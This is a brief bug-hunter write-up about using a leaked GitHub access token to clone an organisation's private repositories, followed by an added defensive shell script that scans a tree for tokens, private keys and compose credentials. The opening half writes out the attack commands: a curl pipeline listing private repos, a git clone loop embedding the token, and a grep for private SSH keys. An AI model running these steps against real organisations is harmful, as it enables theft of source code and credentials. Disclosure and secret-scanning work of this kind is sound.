Full structure takeover of many brands of a company

Directory listing
Automatically expire after 30 days

Let's try to verify

https://api.github.com/orgs/<username>/repos?access_token=<token>
Access token is valid
curl https://api.github.com/orgs/<username>/repos?access_token=<token> | grep '\"name\"' | cut -d ":" -f 2 | cut -d '"' -f 2 > privare_repos_name.txt
for repo in $(cat privare_repos_name.txt); do git clone https://<access-token>@github.com/<username>/$repo; done
5.4G size of all repositories
5.4G !!!!!!
# Grep private ssh key command
grep -R -P '(?=[-]*(?=[A-Z]*(?=[-])))(.*)(?=[-]*(?=[A-Z]*(?=[-])))' .
docker-compose.yml creds

Also Business impact
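
A defender-side counterpart to the steps above, as an added example that is not part of the original post: a shell scan of a tree you own for the secret types that turned up here (a token in a URL query string, a token embedded in a git remote, private key files, docker-compose.yml credentials). The regexes, labels, function names and sample files are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): find the secret types the
# write-up mentions in a tree you own. Patterns and samples are constructed.

# _scan LABEL REGEX DIR: print "path:line:LABEL" for every matching line
_scan() {
  grep -rnIE -e "$2" "$3" | cut -d: -f1,2 | sed "s/\$/:$1/"
}

scan_secrets() {
  # PEM private key header (RSA, EC, OPENSSH, or bare PKCS#8)
  _scan private-key '-----BEGIN ([A-Z0-9]+ )*PRIVATE KEY-----' "$1"
  # Token passed as a URL query parameter, as in the API call above
  _scan url-token 'access_token=[A-Za-z0-9_]{20,}' "$1"
  # Token in the userinfo of a GitHub remote; git stores it in .git/config
  _scan remote-token 'https://[A-Za-z0-9_]{20,}(:[^@/[:space:]]*)?@github\.com' "$1"
  # Literal credential in a compose/env file; ${VAR} references are skipped
  _scan compose-cred '[A-Z_]*(PASSWORD|SECRET|TOKEN)[A-Z_]*[=:][[:space:]]*[^[:space:]$]' "$1"
}

# Build a constructed sample tree with fake values; prints its path
make_sample() {
  d=$(mktemp -d)
  tok=0123456789abcdef0123456789abcdef01234567   # constructed, not a real token
  mkdir -p "$d/app/.git" "$d/deploy"
  printf '%s\n' '[remote "origin"]' \
    "  url = https://$tok@github.com/example-org/app" > "$d/app/.git/config"
  printf '%s\n' '#!/bin/sh' \
    "curl 'https://api.github.com/orgs/example-org/repos?access_token=$tok'" \
    > "$d/deploy/backup.sh"
  printf '%s\n' 'services:' '  db:' '    environment:' \
    '      POSTGRES_PASSWORD: constructed-value' \
    '      API_TOKEN: ${API_TOKEN}' > "$d/deploy/docker-compose.yml"
  printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'Y29uc3RydWN0ZWQ=' \
    '-----END OPENSSH PRIVATE KEY-----' > "$d/deploy/id_ed25519"
  echo "$d"
}

# Demo run: paths are printed relative to the sample root
sample=$(make_sample)
scan_secrets "$sample" | sed "s|^$sample/||"
rm -rf "$sample"
```

The scan deliberately does not skip `.git`: cloning with a token in the URL leaves that token in the clone's `.git/config`, so a copied or published working tree leaks it again.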

Keep following


Penetration tester | Bug Hunter

Abdelrahman Khaled
